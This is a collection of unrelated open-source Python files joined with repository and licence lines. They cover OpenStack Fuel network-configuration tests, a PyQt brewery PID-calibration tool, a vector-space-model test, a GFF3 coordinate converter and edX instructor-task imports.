item_data = asyncio.get_event_loop().run_until_complete(HYNovelInfoItem.get_item(html=HTML))
assert item_data.novel_name == '神仙微信群'
| howie6879/novels-search | tests/test_heiyan_novel_info.py | Python | apache-2.0 | 2,784 |
# -*- coding: utf-8 -*-
# Copyright 2013 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from mock import patch
from sqlalchemy.sql import not_
from nailgun.db.sqlalchemy.models import Cluster
from nailgun.db.sqlalchemy.models import NetworkGroup
from nailgun.network.manager import NetworkManager
from nailgun.openstack.common import jsonutils
from nailgun.test.base import BaseIntegrationTest
from nailgun.test.base import reverse
class TestNovaNetworkConfigurationHandlerMultinode(BaseIntegrationTest):
def setUp(self):
super(TestNovaNetworkConfigurationHandlerMultinode, self).setUp()
cluster = self.env.create_cluster(api=True)
self.cluster = self.db.query(Cluster).get(cluster['id'])
def test_get_request_should_return_net_manager_and_networks(self):
response = self.env.nova_networks_get(self.cluster.id)
data = jsonutils.loads(response.body)
cluster = self.db.query(Cluster).get(self.cluster.id)
self.assertEqual(data['networking_parameters']['net_manager'],
self.cluster.network_config.net_manager)
for network_group in cluster.network_groups:
network = [i for i in data['networks']
if i['id'] == network_group.id][0]
keys = [
'name',
'cluster_id',
'vlan_start',
'cidr',
'id']
for key in keys:
self.assertEqual(network[key], getattr(network_group, key))
def test_not_found_cluster(self):
resp = self.env.nova_networks_get(self.cluster.id + 999,
expect_errors=True)
self.assertEqual(404, resp.status_code)
def test_change_net_manager(self):
self.assertEqual(self.cluster.network_config.net_manager,
'FlatDHCPManager')
new_net_manager = {
'networking_parameters': {'net_manager': 'VlanManager'}
}
self.env.nova_networks_put(self.cluster.id, new_net_manager)
self.db.refresh(self.cluster)
self.assertEqual(
self.cluster.network_config.net_manager,
new_net_manager['networking_parameters']['net_manager'])
def test_change_dns_nameservers(self):
new_dns_nameservers = {
'networking_parameters': {
'dns_nameservers': [
"208.67.222.222",
"208.67.220.220"
]
}
}
self.env.nova_networks_put(self.cluster.id, new_dns_nameservers)
self.db.refresh(self.cluster)
self.assertEqual(
self.cluster.network_config.dns_nameservers,
new_dns_nameservers['networking_parameters']['dns_nameservers']
)
def test_refresh_mask_on_cidr_change(self):
response = self.env.nova_networks_get(self.cluster.id)
data = jsonutils.loads(response.body)
mgmt = [n for n in data['networks']
if n['name'] == 'management'][0]
cidr = mgmt['cidr'].partition('/')[0] + '/25'
mgmt['cidr'] = cidr
resp = self.env.nova_networks_put(self.cluster.id, data)
self.assertEqual(resp.status_code, 202)
task = jsonutils.loads(resp.body)
self.assertEqual(task['status'], 'ready')
self.db.refresh(self.cluster)
mgmt_ng = [ng for ng in self.cluster.network_groups
if ng.name == 'management'][0]
self.assertEqual(mgmt_ng.cidr, cidr)
def test_wrong_net_provider(self):
resp = self.app.put(
reverse(
'NeutronNetworkConfigurationHandler',
kwargs={'cluster_id': self.cluster.id}),
jsonutils.dumps({}),
headers=self.default_headers,
expect_errors=True
)
self.assertEqual(resp.status_code, 400)
self.assertEqual(
resp.body,
u"Wrong net provider - environment uses 'nova_network'"
)
def test_do_not_update_net_manager_if_validation_is_failed(self):
new_net_manager = {
'networking_parameters': {'net_manager': 'VlanManager'},
'networks': [{'id': 500, 'vlan_start': 500}]
}
self.env.nova_networks_put(self.cluster.id, new_net_manager,
expect_errors=True)
self.db.refresh(self.cluster)
self.assertNotEqual(
self.cluster.network_config.net_manager,
new_net_manager['networking_parameters']['net_manager'])
def test_network_group_update_changes_network(self):
network = self.db.query(NetworkGroup).filter(
not_(NetworkGroup.name == "fuelweb_admin")
).first()
self.assertIsNotNone(network)
new_vlan_id = 500 # non-used vlan id
new_nets = {'networks': [{'id': network.id,
'vlan_start': new_vlan_id}]}
resp = self.env.nova_networks_put(self.cluster.id, new_nets)
self.assertEqual(resp.status_code, 202)
self.db.refresh(network)
self.assertEqual(network.vlan_start, 500)
def test_update_networks_and_net_manager(self):
network = self.db.query(NetworkGroup).filter(
not_(NetworkGroup.name == "fuelweb_admin")
).first()
new_vlan_id = 500 # non-used vlan id
new_net = {'networking_parameters': {'net_manager': 'VlanManager'},
'networks': [{'id': network.id, 'vlan_start': new_vlan_id}]}
self.env.nova_networks_put(self.cluster.id, new_net)
self.db.refresh(self.cluster)
self.db.refresh(network)
self.assertEqual(
self.cluster.network_config.net_manager,
new_net['networking_parameters']['net_manager'])
self.assertEqual(network.vlan_start, new_vlan_id)
def test_networks_update_fails_with_wrong_net_id(self):
new_nets = {'networks': [{'id': 500,
'vlan_start': 500}]}
resp = self.env.nova_networks_put(self.cluster.id, new_nets,
expect_errors=True)
self.assertEqual(202, resp.status_code)
task = jsonutils.loads(resp.body)
self.assertEqual(task['status'], 'error')
self.assertEqual(
task['message'],
'Invalid network ID: 500'
)
def test_admin_public_floating_untagged_others_tagged(self):
resp = self.env.nova_networks_get(self.cluster.id)
data = jsonutils.loads(resp.body)
for net in data['networks']:
if net['name'] in ('fuelweb_admin', 'public', 'fixed'):
self.assertIsNone(net['vlan_start'])
else:
self.assertIsNotNone(net['vlan_start'])
def test_mgmt_storage_networks_have_no_gateway(self):
resp = self.env.nova_networks_get(self.cluster.id)
self.assertEqual(200, resp.status_code)
data = jsonutils.loads(resp.body)
for net in data['networks']:
if net['name'] in ['management', 'storage']:
self.assertIsNone(net['gateway'])
def test_management_network_has_gw(self):
net_meta = self.env.get_default_networks_metadata().copy()
mgmt = filter(lambda n: n['name'] == 'management',
net_meta['nova_network']['networks'])[0]
mgmt['use_gateway'] = True
mgmt['gateway'] = '192.168.0.1'
def get_new_networks_metadata():
return net_meta
self.env.get_default_networks_metadata = get_new_networks_metadata
cluster = self.env.create(
cluster_kwargs={},
nodes_kwargs=[{"pending_addition": True}]
)
resp = self.env.nova_networks_get(cluster['id'])
data = jsonutils.loads(resp.body)
mgmt = filter(lambda n: n['name'] == 'management',
data['networks'])[0]
self.assertEqual(mgmt['gateway'], '192.168.0.1')
strg = filter(lambda n: n['name'] == 'storage',
data['networks'])[0]
self.assertIsNone(strg['gateway'])
def test_management_network_gw_set_but_not_in_use(self):
net_meta = self.env.get_default_networks_metadata().copy()
mgmt = filter(lambda n: n['name'] == 'management',
net_meta['nova_network']['networks'])[0]
mgmt['gateway'] = '192.168.0.1'
self.assertEqual(mgmt['use_gateway'], False)
def get_new_networks_metadata():
return net_meta
self.env.get_default_networks_metadata = get_new_networks_metadata
cluster = self.env.create(
cluster_kwargs={},
nodes_kwargs=[{"pending_addition": True}]
)
resp = self.env.nova_networks_get(cluster['id'])
data = jsonutils.loads(resp.body)
for n in data['networks']:
if n['name'] in ('management', 'storage'):
self.assertIsNone(n['gateway'])
class TestNeutronNetworkConfigurationHandlerMultinode(BaseIntegrationTest):
def setUp(self):
super(TestNeutronNetworkConfigurationHandlerMultinode, self).setUp()
cluster = self.env.create_cluster(api=True,
net_provider='neutron',
net_segment_type='gre',
mode='ha_compact'
)
self.cluster = self.db.query(Cluster).get(cluster['id'])
def test_get_request_should_return_net_provider_segment_and_networks(self):
response = self.env.neutron_networks_get(self.cluster.id)
data = jsonutils.loads(response.body)
cluster = self.db.query(Cluster).get(self.cluster.id)
self.assertEqual(data['networking_parameters']['segmentation_type'],
self.cluster.network_config.segmentation_type)
for network_group in cluster.network_groups:
network = [i for i in data['networks']
if i['id'] == network_group.id][0]
keys = [
'name',
'cluster_id',
'vlan_start',
'cidr',
'id']
for key in keys:
self.assertEqual(network[key], getattr(network_group, key))
def test_get_request_should_return_vips(self):
response = self.env.neutron_networks_get(self.cluster.id)
data = jsonutils.loads(response.body)
self.assertIn('public_vip', data)
self.assertIn('management_vip', data)
def test_not_found_cluster(self):
resp = self.env.neutron_networks_get(self.cluster.id + 999,
expect_errors=True)
self.assertEqual(404, resp.status_code)
def test_refresh_mask_on_cidr_change(self):
response = self.env.neutron_networks_get(self.cluster.id)
data = jsonutils.loads(response.body)
mgmt = [n for n in data['networks']
if n['name'] == 'management'][0]
cidr = mgmt['cidr'].partition('/')[0] + '/25'
mgmt['cidr'] = cidr
resp = self.env.neutron_networks_put(self.cluster.id, data)
self.assertEqual(202, resp.status_code)
task = jsonutils.loads(resp.body)
self.assertEqual(task['status'], 'ready')
self.db.refresh(self.cluster)
mgmt_ng = [ng for ng in self.cluster.network_groups
if ng.name == 'management'][0]
self.assertEqual(mgmt_ng.cidr, cidr)
def test_do_not_update_net_segmentation_type(self):
resp = self.env.neutron_networks_get(self.cluster.id)
data = jsonutils.loads(resp.body)
data['networking_parameters']['segmentation_type'] = 'vlan'
resp = self.env.neutron_networks_put(self.cluster.id, data,
expect_errors=True)
self.assertEqual(202, resp.status_code)
task = jsonutils.loads(resp.body)
self.assertEqual(task['status'], 'error')
self.assertEqual(
task['message'],
"Change of 'segmentation_type' is prohibited"
)
def test_network_group_update_changes_network(self):
resp = self.env.neutron_networks_get(self.cluster.id)
data = jsonutils.loads(resp.body)
network = self.db.query(NetworkGroup).get(data['networks'][0]['id'])
self.assertIsNotNone(network)
data['networks'][0]['vlan_start'] = 500 # non-used vlan id
resp = self.env.neutron_networks_put(self.cluster.id, data)
self.assertEqual(resp.status_code, 202)
self.db.refresh(network)
self.assertEqual(network.vlan_start, 500)
def test_update_networks_fails_if_change_net_segmentation_type(self):
resp = self.env.neutron_networks_get(self.cluster.id)
data = jsonutils.loads(resp.body)
network = self.db.query(NetworkGroup).get(data['networks'][0]['id'])
self.assertIsNotNone(network)
data['networks'][0]['vlan_start'] = 500 # non-used vlan id
data['networking_parameters']['segmentation_type'] = 'vlan'
resp = self.env.neutron_networks_put(self.cluster.id, data,
expect_errors=True)
self.assertEqual(202, resp.status_code)
task = jsonutils.loads(resp.body)
self.assertEqual(task['status'], 'error')
self.assertEqual(
task['message'],
"Change of 'segmentation_type' is prohibited"
)
def test_networks_update_fails_with_wrong_net_id(self):
new_nets = {'networks': [{'id': 500,
'name': 'new',
'vlan_start': 500}]}
resp = self.env.neutron_networks_put(self.cluster.id, new_nets,
expect_errors=True)
self.assertEqual(202, resp.status_code)
task = jsonutils.loads(resp.body)
self.assertEqual(task['status'], 'error')
self.assertEqual(
task['message'],
'Invalid network ID: 500'
)
def test_refresh_public_cidr_on_its_change(self):
data = jsonutils.loads(self.env.neutron_networks_get(
self.cluster.id).body)
publ = filter(lambda ng: ng['name'] == 'public', data['networks'])[0]
self.assertEqual(publ['cidr'], '172.16.0.0/24')
publ['cidr'] = '199.61.0.0/24'
publ['gateway'] = '199.61.0.1'
publ['ip_ranges'] = [['199.61.0.11', '199.61.0.33'],
['199.61.0.55', '199.61.0.99']]
data['networking_parameters']['floating_ranges'] = \
[['199.61.0.111', '199.61.0.122']]
resp = self.env.neutron_networks_put(self.cluster.id, data)
self.assertEqual(202, resp.status_code)
task = jsonutils.loads(resp.body)
self.assertEqual(task['status'], 'ready')
self.db.refresh(self.cluster)
publ_ng = filter(lambda ng: ng.name == 'public',
self.cluster.network_groups)[0]
self.assertEqual(publ_ng.cidr, '199.61.0.0/24')
def test_admin_public_untagged_others_tagged(self):
resp = self.env.neutron_networks_get(self.cluster.id)
data = jsonutils.loads(resp.body)
for net in data['networks']:
if net['name'] in ('fuelweb_admin', 'public',):
self.assertIsNone(net['vlan_start'])
else:
self.assertIsNotNone(net['vlan_start'])
def test_mgmt_storage_networks_have_no_gateway(self):
resp = self.env.neutron_networks_get(self.cluster.id)
self.assertEqual(200, resp.status_code)
data = jsonutils.loads(resp.body)
for net in data['networks']:
if net['name'] in ['management', 'storage']:
self.assertIsNone(net['gateway'])
def test_management_network_has_gw(self):
net_meta = self.env.get_default_networks_metadata().copy()
mgmt = filter(lambda n: n['name'] == 'management',
net_meta['neutron']['networks'])[0]
mgmt['use_gateway'] = True
def get_new_networks_metadata():
return net_meta
self.env.get_default_networks_metadata = get_new_networks_metadata
cluster = self.env.create(
cluster_kwargs={'net_provider': 'neutron',
'net_segment_type': 'gre'},
nodes_kwargs=[{"pending_addition": True}]
)
resp = self.env.neutron_networks_get(cluster['id'])
data = jsonutils.loads(resp.body)
mgmt = filter(lambda n: n['name'] == 'management',
data['networks'])[0]
self.assertEqual(mgmt['gateway'], '192.168.0.1')
strg = filter(lambda n: n['name'] == 'storage',
data['networks'])[0]
self.assertIsNone(strg['gateway'])
class TestNovaNetworkConfigurationHandlerHA(BaseIntegrationTest):
def setUp(self):
super(TestNovaNetworkConfigurationHandlerHA, self).setUp()
cluster = self.env.create_cluster(api=True, mode='ha_compact')
self.cluster = self.db.query(Cluster).get(cluster['id'])
self.net_manager = NetworkManager
def test_returns_management_vip_and_public_vip(self):
resp = jsonutils.loads(
self.env.nova_networks_get(self.cluster.id).body)
self.assertEqual(
resp['management_vip'],
self.net_manager.assign_vip(self.cluster.id, 'management'))
self.assertEqual(
resp['public_vip'],
self.net_manager.assign_vip(self.cluster.id, 'public'))
class TestAdminNetworkConfiguration(BaseIntegrationTest):
@patch('nailgun.db.sqlalchemy.fixman.settings.ADMIN_NETWORK', {
"cidr": "192.168.0.0/24",
"size": "256",
"first": "192.168.0.129",
"last": "192.168.0.254"
})
def setUp(self):
super(TestAdminNetworkConfiguration, self).setUp()
self.cluster = self.env.create(
cluster_kwargs={
"api": True
},
nodes_kwargs=[
{"pending_addition": True, "api": True}
]
)
def test_netconfig_error_when_admin_cidr_match_other_network_cidr(self):
resp = self.env.nova_networks_get(self.cluster['id'])
nets = jsonutils.loads(resp.body)
resp = self.env.nova_networks_put(self.cluster['id'], nets,
expect_errors=True)
self.assertEqual(resp.status_code, 202)
task = jsonutils.loads(resp.body)
self.assertEqual(task['status'], 'error')
self.assertEqual(task['progress'], 100)
self.assertEqual(task['name'], 'check_networks')
self.assertIn("Address space intersection between networks:\n"
"admin (PXE), management.",
task['message'])
def test_deploy_error_when_admin_cidr_match_other_network_cidr(self):
resp = self.env.cluster_changes_put(self.cluster['id'],
expect_errors=True)
self.assertEqual(resp.status_code, 202)
task = jsonutils.loads(resp.body)
self.assertEqual(task['status'], 'error')
self.assertEqual(task['progress'], 100)
self.assertEqual(task['name'], 'deploy')
self.assertIn("Address space intersection between networks:\n"
"admin (PXE), management.",
task['message'])
| Axam/nsx-web | nailgun/nailgun/test/integration/test_network_configuration.py | Python | apache-2.0 | 20,114 |
import sys
import os
sys.path.insert(0, os.path.abspath(".."))
import time
from PyQt5 import QtCore, QtGui, QtWidgets, uic
import pyqtgraph
import threading
from multiprocessing import Pipe
import pickle
from automatedbrewery.HeatControl import HeatController
from automatedbrewery.RTDSensor import tempSensors
from automatedbrewery.PID import PID
qtCreatorFile = "../UI/AutomatedBreweryUI/PIDCalibrationDialog.ui"
Ui_MainWindow, QtBaseClass = uic.loadUiType(qtCreatorFile)
class PIDCalibration(QtWidgets.QMainWindow, Ui_MainWindow):
tempSignal = QtCore.pyqtSignal(list)
#heatControlSignal = QtCore.pyqtSignal(list)
#HLTPIDSignal = QtCore.pyqtSignal(list)
#BLKPIDSignal = QtCore.pyqtSignal(list)
heatGraphSignal = QtCore.pyqtSignal(float,float,str)
#setHeatSignal = QtCore.pyqtSignal(str,str,int)
messageSignal = QtCore.pyqtSignal(str,str)
heatToHLTPIDPipe, HLTPIDToHeatPipe = Pipe()
UIToHLTPIDPipe, HLTPIDToUIPipe = Pipe()
heatToBLKPIDPipe, BLKPIDToHeatPipe = Pipe()
UIToBLKPIDPipe, BLKPIDToUIPipe = Pipe()
UIToHeatPipe, heatToUIPipe = Pipe()
errorBrush = QtGui.QBrush(QtCore.Qt.SolidPattern)
errorBrush.setColor(QtGui.QColor(203,34,91))
successBrush = QtGui.QBrush(QtCore.Qt.SolidPattern)
successBrush.setColor(QtGui.QColor(7,155,132))
def __init__(self):
super(PIDCalibration, self).__init__()
#Imports the old calibration, if there is a file available
if os.path.isfile('../calibrations/PIDCalibration.pk1'):
with open('../calibrations/PIDCalibration.pk1','rb') as input:
self.HLTResults = pickle.load(input)
self.BLKResults = pickle.load(input)
else:
self.HLTResults = []
self.BLKResults = []
#Sets global pyqtgraph settings
pyqtgraph.setConfigOption('background', 'w')
pyqtgraph.setConfigOption('foreground', 'k')
#connects the signals to their respective functions
self.tempSignal.connect(self.tempUpdate)
#self.setHeatSignal.connect(self.setHeat)
self.heatGraphSignal.connect(self.updateHeatGraph)
self.messageSignal.connect(self.newMessage)
#Starts up the UI
self.setupUi(self)
self.Messages.clear()
self.show()
self.turnOffTempSensing = False
self.currentlyCalibrating = False
self.stopCalibration = False
#Creates threads for each of the sensors and controllers
self.HLTPIDThread = threading.Thread(name='HLTPIDThread',target = self.startHLTPID)
self.BLKPIDThread = threading.Thread(name='BLKPIDThread',target = self.startBLKPID)
self.heatThread = threading.Thread(name='heatThread',target = self.startHeatControl)
self.tempThread = threading.Thread(name='tempThread',target = self.startTempSensing)
self.resultListenerThread = threading.Thread(name='resultListenerThread',target = self.listenForCalibrationResults)
#Connects the buttons
self.Calibrate_HLT.clicked.connect(lambda: self.startCalibration("HLT"))
self.Calibrate_BLK.clicked.connect(lambda: self.startCalibration("BLK"))
self.Complete_Calibration.clicked.connect(self.completeCalibration)
#Defaults the kettle setting to none
self.kettleSetting = "None"
#creates the initial graph series and pens
self.tempx=[[],[],[]]
self.tempy=[[],[],[]]
self.heatx=[[],[]]
self.heaty=[[],[]]
self.HLTPen = pyqtgraph.mkPen(color = (157,224,234), width = 3)
self.MLTPen = pyqtgraph.mkPen(color = (0,138,179), width = 3)
self.BLKPen = pyqtgraph.mkPen(color = (0,44,119), width = 3)
self.startTime = time.time()
#Starts the above threads
self.tempThread.start()
self.heatThread.start()
self.HLTPIDThread.start()
self.BLKPIDThread.start()
self.resultListenerThread.start()
def startHLTPID(self):
time.sleep(1)
self.HLTPID = PID(self,"HLTTemp")
self.HLTPID.outputPipeConn = self.HLTPIDToHeatPipe
self.HLTPID.inputPipeConn = self.HLTPIDToUIPipe
self.HLTPID.messageSignal = self.messageSignal
self.HLTPID.outputMin = 0
self.HLTPID.outputMax = 100
self.HLTPID.cycleTime = 2000
self.HLTPID.outputAttributeName = "heatSetting"
#self.HLTPID.semiAutoValue = 0
self.HLTPID.mode = "Off"
#self.HLTPID.tempGraphSignal = self.tempSignal
self.HLTPID.run()
def startBLKPID(self):
time.sleep(1)
self.BLKPID = PID(self,"BLKTemp")
self.BLKPID.outputPipeConn = self.BLKPIDToHeatPipe
self.BLKPID.inputPipeConn = self.BLKPIDToUIPipe
self.BLKPID.messageSignal = self.messageSignal
self.BLKPID.outputMin = 0
self.BLKPID.outputMax = 100
self.BLKPID.cycleTime = 2000
self.BLKPID.outputAttributeName = "heatSetting"
#self.BLKPID.semiAutoValue = 0
self.BLKPID.mode = "Off"
#self.BLKPID.tempGraphSignal = self.tempSignal
self.BLKPID.run()
def startHeatControl(self):
heatCtrl = HeatController(pipeConn = self.heatToHLTPIDPipe,pipeConn2 = self.heatToBLKPIDPipe,pipeConn3 = self.heatToUIPipe, heatGraphSignal = self.heatGraphSignal)
heatCtrl.run()
def startTempSensing(self):
self.tempSensor = tempSensors()
while self.turnOffTempSensing == False:
temps = [self.tempSensor.HLTTemp(),self.tempSensor.MLTTemp(),self.tempSensor.BLKTemp()]
self.tempSignal.emit(temps)
time.sleep(.1)
def tempUpdate(self, tempValues):
#OldHLTText = self.HLT_Heat.text()
#OldMLTText = self.MLT_Heat.text()
#OldBLKText = self.BLK_Heat.text()
self.HLTTemp = tempValues[0]
self.MLTTemp = tempValues[1]
self.BLKTemp = tempValues[2]
if tempValues[0]>999:tempValues[0]=999
if tempValues[1]>999:tempValues[1]=999
if tempValues[2]>999:tempValues[2]=999
if tempValues[0]<0:tempValues[0]=0
if tempValues[1]<0:tempValues[1]=0
if tempValues[2]<0:tempValues[2]=0
#NewHLTText=OldHLTText[:14]+"{: >3d}".format(int(round(tempValues[0])))+OldHLTText[17:]
#NewMLTText=OldMLTText[:14]+"{: >3d}".format(int(round(tempValues[1])))+OldMLTText[17:]
#NewBLKText=OldBLKText[:14]+"{: >3d}".format(int(round(tempValues[2])))+OldBLKText[17:]
#self.HLT_Heat.setText(NewHLTText)
#self.MLT_Heat.setText(NewMLTText)
#self.BLK_Heat.setText(NewBLKText)
currTime = (time.time() - self.startTime)/60
if tempValues[0] != 999 and tempValues[0] != 0:
self.tempy[0].append(tempValues[0])
self.tempx[0].append(currTime)
if tempValues[1] != 999 and tempValues[1] != 0:
self.tempy[1].append(tempValues[1])
self.tempx[1].append(currTime)
if tempValues[2] != 999 and tempValues[2] != 0:
self.tempy[2].append(tempValues[2])
self.tempx[2].append(currTime)
self.Temp_Graph.clear()
self.Temp_Graph.plot(self.tempx[0],self.tempy[0], pen=self.HLTPen)
self.Temp_Graph.plot(self.tempx[1],self.tempy[1], pen=self.MLTPen)
self.Temp_Graph.plot(self.tempx[2],self.tempy[2], pen=self.BLKPen)
def updateHeatGraph(self,time,heatSetting,kettle):
currTime = (time/1000 - self.startTime)/60
if kettle == "HLT":
self.heaty[0].append(heatSetting)
self.heatx[0].append(currTime)
self.heaty[1].append(0)
self.heatx[1].append(currTime)
elif kettle == "BLK":
self.heaty[1].append(heatSetting)
self.heatx[1].append(currTime)
self.heaty[0].append(0)
self.heatx[0].append(currTime)
else:
self.heaty[0].append(0)
self.heatx[0].append(currTime)
self.heaty[1].append(0)
self.heatx[1].append(currTime)
self.Power_Graph.clear()
self.Power_Graph.plot(self.heatx[0],self.heaty[0], pen=self.HLTPen)
self.Power_Graph.plot(self.heatx[1],self.heaty[1], pen=self.BLKPen)
def printAndSendMessage(self,message,messageType):
print(message)
self.newMessage(message,messageType)
def newMessage(self,message,messageType):
newmessage = QtWidgets.QListWidgetItem(self.Messages)
newmessage.setText(message)
if messageType == "Alarm": newmessage.setBackground(self.errorBrush)
elif messageType == "Warning": newmessage.setForeground(self.errorBrush)
elif messageType == "Success": newmessage.setForeground(self.successBrush)
self.Messages.scrollToBottom()
def startCalibration(self,kettle):
#gets the parameters from the UI
outputStartValue = float(self.Output_Start_Value.text())
outputChange = float(self.Output_Change.text())
expectedNoiseAmplitude = float(self.Expected_Noise_Amplitude.text())
steadyRequirementTime = float(self.Steady_Requirement.text())*1000
triggerDelta = float(self.Temp_Change_Requirement.text())
lookBackTime = float(self.Lookback_Time.text())*1000
requiredAccuracy = float(self.Accuracy_Requirement.text())
#packs the parameters into a list to be sent
autoTuneParameters = [outputStartValue,outputChange,expectedNoiseAmplitude,steadyRequirementTime,triggerDelta,lookBackTime,requiredAccuracy]
#sends instructions to the kettle to calibrate, and waits for calibration results
if kettle == "HLT":
if self.currentlyCalibrating != True:
self.currentlyCalibrating = True
self.kettleSetting = "HLT"
self.UIToBLKPIDPipe.send(("mode","Off"))
self.UIToHLTPIDPipe.send(("autoTune",autoTuneParameters))
self.UIToHeatPipe.send(("kettle","HLT"))
else: self.printAndSendMessage("Error: Currently calibrating a PID","Alarm")
if kettle == "BLK":
if self.currentlyCalibrating != True:
self.currentlyCalibrating = True
self.kettleSetting = "BLK"
self.UIToHLTPIDPipe.send(("mode","Off"))
self.UIToBLKPIDPipe.send(("autoTune",autoTuneParameters))
self.UIToHeatPipe.send(("kettle","BLK"))
else: self.printAndSendMessage("Error: Currently calibrating a PID","Alarm")
def listenForCalibrationResults(self):
while self.stopCalibration == False:
if self.UIToHLTPIDPipe.poll():
self.HLTResults = self.UIToHLTPIDPipe.recv()
self.currentlyCalibrating = False
#self.printAndSendMessage(self.HLTResults,"Message")
if self.UIToBLKPIDPipe.poll():
self.BLKResults = self.UIToBLKPIDPipe.recv()
self.currentlyCalibrating = False
#self.printAndSendMessage(self.BLKResults,"Message")
time.sleep(2)
def completeCalibration(self):
self.printAndSendMessage("New calibrations:","success")
if self.HLTResults != []:
self.printAndSendMessage("HLT: Kp={:.2f}, Ki={:.2f}, Kd={:.2f}".format(self.HLTResults[0],self.HLTResults[1],self.HLTResults[2]),"success")
if self.BLKResults != []:
self.printAndSendMessage("BLK: Kp={:.2f}, Ki={:.2f}, Kd={:.2f}".format(self.BLKResults[0],self.BLKResults[1],self.BLKResults[2]),"success")
with open('PIDCalibration.pk1','wb') as output:
pickle.dump(self.HLTResults,output,protocol = pickle.HIGHEST_PROTOCOL)
pickle.dump(self.BLKResults,output,protocol = pickle.HIGHEST_PROTOCOL)
self.close()
def closeEvent(self, *args, **kwargs):
#turns off heat
self.UIToHLTPIDPipe.send(("mode","Off"))
self.UIToHLTPIDPipe.send(("stop",True))
self.UIToBLKPIDPipe.send(("mode","Off"))
self.UIToBLKPIDPipe.send(("stop",True))
self.UIToHeatPipe.send(("kettle","None"))
self.UIToHeatPipe.send(("heatSetting",0))
self.UIToHeatPipe.send(("turnOff",True))
self.turnOffTempSensing = True
self.stopCalibration = True
super(PIDCalibration, self).closeEvent
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
window = PIDCalibration()
sys.exit(app.exec_())
| Bobstin/AutomatedBrewery | calibrations/PIDCalibration.py | Python | mit | 12,559 |
#!/usr/bin/python
#
# File : runtests.py
# Created : 14-Jul-2011
# By : atrilla
#
# Testing script
#
# Copyright (c) 2011 Alexandre Trilla
#
# This file is part of VSMpy.
#
# You should have received a copy of the rights granted with this
# distribution of VSMpy. See LICENCE.
#
import vsmpy.vsm
class Test():
def testVSM(self):
theVSM = vsmpy.vsm.VectorSpaceModel()
theVSM.input(theVSM.parse("I love playing football ."), "C1")
theVSM.input(theVSM.parse("I like playing tennis ."), "C2")
theVSM.train()
#
if ((theVSM.cosine(theVSM.parse("Do you enjoy playing football ?"), "C1") > theVSM.cosine(theVSM.parse("Do you enjoy playing football"), "C2")) == True):
print "VSM ...\t OK"
else:
print "VSM ...\t FAILED!!!"
# conditional runs tests if this file called as script
# (allows import w/o run)
if __name__ == '__main__':
test = Test()
test.testVSM()
| atrilla/vsmpy | test/runtests.py | Python | mit | 926 |
#!/usr/bin/env python
#
# -----------------------------------------------------------------------------
# Copyright (C) 2020 Daniel Standage <daniel.standage@gmail.com>
#
# This file is part of tag (http://github.com/standage/tag) and is licensed
# under the BSD 3-clause license: see LICENSE.
# -----------------------------------------------------------------------------
import argparse
import sys
import tag
def pep2nuc(genomestream, protstream, attr='ID', keepattr=None):
index = tag.index.NamedIndex()
index.consume(tag.GFF3Reader(genomestream), attribute=attr)
reader = tag.GFF3Reader(protstream)
for feature in tag.select.features(reader):
if feature.seqid not in index:
print(
'[tag::pep2nuc] WARNING:',
'protein identifier "{}" not defined'.format(feature.seqid),
file=sys.stderr
)
continue
gfeat = index[feature.seqid]
newstart = gfeat.start + (feature.start * 3)
newend = gfeat.start + (feature.end * 3)
protid = feature.seqid
feature.seqid = gfeat.seqid
feature.set_coord(newstart, newend)
if keepattr:
feature.add_attribute(keepattr, protid)
yield feature
def subparser(subparsers):
subparser = subparsers.add_parser('pep2nuc')
subparser.add_argument(
'-o', '--out', metavar='FILE', default='-', help='file to which '
'output will be written; by default, output is written to the '
'terminal (stdout)'
)
subparser.add_argument(
'-a', '--attr', metavar='ATTR', default='ID', help='CDS/protein '
'attribute in the genome GFF3 file that corresponds to the protein '
'identifier (column 1) of the protein GFF3 file; "ID" by default'
)
subparser.add_argument(
'-k', '--keep-prot', metavar='ATTR', help='keep the original protein '
'ID and write it to the specified attribute in the output'
)
subparser.add_argument(
'genome', help='GFF3 file with CDS or protein features defined on a '
'genomic (contig, scaffold, or chromosome) coordinate system'
)
subparser.add_argument(
'protein', help='GFF3 file with features defined on a protein '
'coordinate system'
)
def main(args):
with tag.open(args.genome, 'r') as genomestream:
with tag.open(args.protein, 'r') as protstream:
transformer = pep2nuc(
genomestream, protstream, attr=args.attr,
keepattr=args.keep_prot
)
writer = tag.GFF3Writer(transformer, outfile=args.out)
writer.retainids = True
writer.write()
| standage/tag | tag/cli/pep2nuc.py | Python | bsd-3-clause | 2,702 |
"""
This file contains tasks that are designed to perform background operations on the
running state of a course.
"""
import json
from collections import OrderedDict
from datetime import datetime
from django.conf import settings
from eventtracking import tracker
from itertools import chain
from time import time
import unicodecsv
import logging
from django.db import connection
from django.db.utils import DatabaseError
from celery import Task, current_task
from celery.states import SUCCESS, FAILURE
from django.contrib.auth.models import User
from django.core.files.storage import DefaultStorage
from django.db import transaction, reset_queries
from django.db.models import Q
import dogstats_wrapper as dog_stats_api
from pytz import UTC
import MySQLdb
from StringIO import StringIO
from edxmako.shortcuts import render_to_string
from instructor.paidcourse_enrollment_report import PaidCourseEnrollmentReportProvider
from shoppingcart.models import (
PaidCourseRegistration, CourseRegCodeItem, InvoiceTransaction,
Invoice, CouponRedemption, RegistrationCodeRedemption, CourseRegistrationCode
)
from track.views import task_track
from util.file import course_filename_prefix_generator, UniversalNewlineIterator
from xmodule.modulestore.django import modulestore
from xmodule.split_test_module import get_split_user_partitions
from django.utils.translation import ugettext as _
from certificates.models import (
CertificateWhitelist,
certificate_info_for_user,
CertificateStatuses
)
from certificates.api import generate_user_certificates
from courseware.courses import get_course_by_id, get_problems_in_section
from courseware.grades import iterate_grades_for
from courseware.models import StudentModule
from courseware.model_data import FieldDataCache
from courseware.module_render import get_module_for_descriptor_internal
from instructor_analytics.basic import enrolled_students_features, list_may_enroll
from instructor_analytics.csvs import format_dictlist
from instructor_task.models import ReportStore, InstructorTask, PROGRESS
from lms.djangoapps.lms_xblock.runtime import LmsPartitionService
from openedx.core.djangoapps.course_groups.cohorts import get_cohort
from openedx.core.djangoapps.course_groups.models import CourseUserGroup
